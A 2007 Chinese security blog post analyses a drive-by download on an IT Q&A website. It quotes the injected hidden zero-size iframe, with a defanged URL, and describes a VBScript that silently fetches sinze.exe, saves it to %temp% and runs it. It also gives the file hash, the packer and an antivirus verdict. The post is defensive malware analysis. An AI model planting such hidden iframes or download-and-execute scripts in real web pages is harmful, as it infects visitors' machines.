[07-01-06]打开某IT技术问答网站时自动下载文件sinze.exe/Trojan-Dropper.Win32.Agent.awq

最新推荐文章于 2022-02-27 17:55:56 发布
最新推荐文章于 2022-02-27 17:55:56 发布
阅读量3.6k 收藏
点赞数
分类专栏: 系统安全 文章标签: warnings vbscript statistics file 脚本 引擎
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Purpleendurer/article/details/1465125
版权

endurer 原创

2007-01-06 第2版 补充 Kaspersky 的反应
2006-12-27 第1

该网站首页被加入代码:
/-------
...<iframe src=hxxp://www..xj123***.net/ad***/*1***/*1 width=0 height=0 frameborder=0></iframe>
-------/

打开 hxxp://www..xj123***.net/ad***/*1***/*1  会自动转到

hxxp://i***.the***c**.***.cn/*sinze***/sinze.htm

打开这个 sinze.htm 网页,会看到信息:

/-------
就不让你看!气死你 by knel!
-------/

但这只是表面,该网页下面的 VBScript脚本代码会背地里会利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 sinze.exe,保存为 %temp%g0ld.com,并利用Shell.Application 对象 的 ShellExecute 方法 来运行。


sinze.exe 采用 SVKP 1.3x -> Pavol Cerven 加壳。

/-------
文件说明符 : d:/test/sinze.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2006-12-11 4:25:57
修改时间 : 2006-12-11 4:25:58
访问时间 : 2006-12-27 0:0:0
大小 : 424621 字节 414.685 KB
MD5 : 1937f1ba8627794e232db40a11b8ec0f
-------/

瑞星19.03.12对此文件无反应。

由于昨晚南海海域发生地震,多条海底通信光缆中断,无法使用国外网站的多引擎扫描测试…… 

 

Scanned file:   sinze.exe - Infected

sinze.exe - infected by Trojan-Dropper.Win32.Agent.awq

Statistics:

Known viruses:256347Updated:06-01-2007
File size (Kb):415Virus bodies:1
Files:1Warnings:0
Archives:0Suspicious:0

紫郢剑侠
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Web自动化成长之路:selenium中编写Xpath表达式
qq_41130705的博客
07-29 464
a)绝对路径从根目录开始,root例子/开头是绝对路径b)相对路径在一个路径下,另外的路径以这个路径作为参照例子//标签名[@属性名="属性值"]//开头是相对路径@符号是属性。
POJ 3258- River Hopscotch(二分求最小值最大)
Rocky0429
06-01 2097
River Hopscotch Time Limit:2000MS     Memory Limit:65536KB     64bit IO Format:%I64d & %I64u Submit Status Practice POJ 3258 Appoint description:  System Crawler  (2015-05-27) Descripti
httpURLConnection 报错 java.net.ConnectException: localhost/127.0.0.1:8080 - Connection refused
Kodulf的专栏
03-20 9403
03-20 13:56:19.120 382-393/? W/System.err: java.net.ConnectException: localhost/127.0.0.1:8080 - Connection refused 03-20 13:56:19.170 382-393/? W/System.err:     at org.apache.harmony.luni.net.Plain
01-15/某师范学院网站被挂马 sinze.exe/Virus.Win32.Delf.an
Purpleendurer@CSDN
01-12 2163
endurer 原创2007-01-15 第2版 补充Kaspersky的反应2007-01-12 第1版网站的网页被加入代码:/------<iframe src=hxxp://i***.the*c***.cn/sin**ze*/sin**ze*.htm width=0 height=0></iframe>------/sin**ze*.htm   Kaspersky 报为 Troj
java开发工程师入门第一阶段(03-java基础)
javaLkx的博客
02-27 105
文章目录四.基础API1.Object2.String3.StringBuilder与StringBuffer1.String的:2.StringBuilder的:4.包装类5.自动装箱与自动拆箱五.高级API1.IO流字节输入流InputStream:字节输出流OutputStream:字符输入流Reader:字符输出流Writer:2.集合 四.基础API 1.Object 1.是所有类的超类,Java中的类都直接或者间接的继承了Object 2. 如果一个类没有明确指定父类,那么默认继承Object
IE6 SP2不支持view-source 微软要逼我们转向FireFox?
caobihole
12-28 94
endurer 原创 2006-12-28 第1版 昨晚分析 打开某IT技术问答网站自动下载文件sinze.exehttp://endurer.bokee.com/5994845.htmlhttp://blog.csdn.net/Purpleendurer/archive/2006/12/27/1465125.aspx 中的网页,习惯性的在Maxthon地址栏输入view-source...
PLSQL result set exceeds the maximum size(100M)
飞乐鸟的博客
09-25 1352
解决: TOOLS-- PREFERENCES-WINDOW TYPES -SQL WINDOW - MAXIMUM RESULT SET SIZE
雪庐小酒学ExtJS:ExtJS6.2 项目部署 Java+Nginx
weixin_30588827的博客
03-13 156
一、 简单介绍 这个是纯ExtJS 前端,后台是使用Java写的。使用的前后台分离,数据是以json格式进行传递。这里具体的细节我就不讲了。我这里只写一下项目部署到服务器,由于真正的部署是使用sencha命令进行打包,发布,那个我还不是太明白,这里只是简单的把我在电脑上的代码环境进行了配置,服务器也是测试使用的。各位暂且先看着,之后我解决了打包问题,就对这片文章进行后续的更新。 二...
VB+ACCESS宾馆客房管理系统(系统+论文+封面).zip
08-16
计算机毕业设计资源包含(项目部署视频+源码+LW+开题报告等等),所有项目经过助教老师跑通,有问题可以私信博主解决,可以免费帮部署。
自密实混凝土的研究进展.doc
08-16
自密实混凝土的研究进展.doc
基于Andriod条码识别的商品价格查询软件APP设计与实现.docx
08-16
基于Andriod条码识别的商品价格查询软件APP设计与实现.docx
基于python的人脸控制俄罗斯方块小游戏
08-16
基于python的人脸控制俄罗斯方块小游戏
vb+access高校固定资产管理系统(论文+程序).zip
最新发布
08-16
计算机毕业设计资源包含(项目部署视频+源码+LW+开题报告等等),所有项目经过助教老师跑通,有问题可以私信博主解决,可以免费帮部署。
redis,一个使用ANSI C编写的开源、包含多种数据结构、支持网络、基于内存、可选持久性的键值对存储数
08-16
引言 在Web应用发展的初期,那关系型数据库受到了较为广泛的关注和应用,原因是因为那候Web站点基本上访问和并发不高、交互也较少。而在后来,随着访问量的提升,使用关系型数据库的Web站点多多少少都开始在性能上出现了一些瓶颈,而瓶颈的源头一般是在磁盘的I/O上。而随着互联网技术的进一步发展,各种类型的应用层出不穷,这导致在当今云计算、大数据盛行的代,对性能有了更多的需求,主要体现在以下四个方面: 低延迟的读写速度:应用快速地反应能极大地提升用户的满意度 支撑海量的数据和流量:对于搜索这样大型应用而言,需要利用PB级别的数据和能应对百万级的流量 大规模集群的管理:系统管理员希望分布式应用能更简单的部署和管理 庞大运营成本的考量:IT部门希望在硬件成本、软件成本和人力成本能够有大幅度地降低 为了克服这一问题,NoSQL应运而生,它同具备了高性能、可扩展性强、高可用等优点,受到广泛开发人员和仓库管理人员的青睐。 Redis是什么 Redis是现在最受欢迎的NoSQL数据库之一,Redis是一个使用ANSI C编写的开源、包含多种数据结构、支持网络、基于内存、可选持久性的键值对存储数
51单片机(STC89C2)学习笔记2-4独立按键控制LED移位
08-16
51单片机(STC89C2)学习笔记2-4独立按键控制LED移位C语言代码
施耐德ATVA71变频器编程手册
08-16
施耐德ATVA71变频器编程手册
基于jsoncpp1.9.5源码修改,解决中文汉字乱码和小数点精度丢失问题
08-16
jsoncpp1.9.5源码修改使用VS2022生成静态lib文件,包含2个项目工程一个静态编译方法和一个示例源码,生成了x86 x64的调试版和发布版,静态编译工程也可以自己再次编译,源码可以按需自行修改 {"base_para":{"chann_num":1,"height":460,"width":680},"para":[{"flag":0,"name":"卧槽","th":0.456},{"flag":1,"name":"牛上天","th":0.8537}],"project":"哈哈,你好"}
基于Android任务管理器APP设计与实现.docx
08-16
基于Android任务管理器APP设计与实现.docx
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

紫郢剑侠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值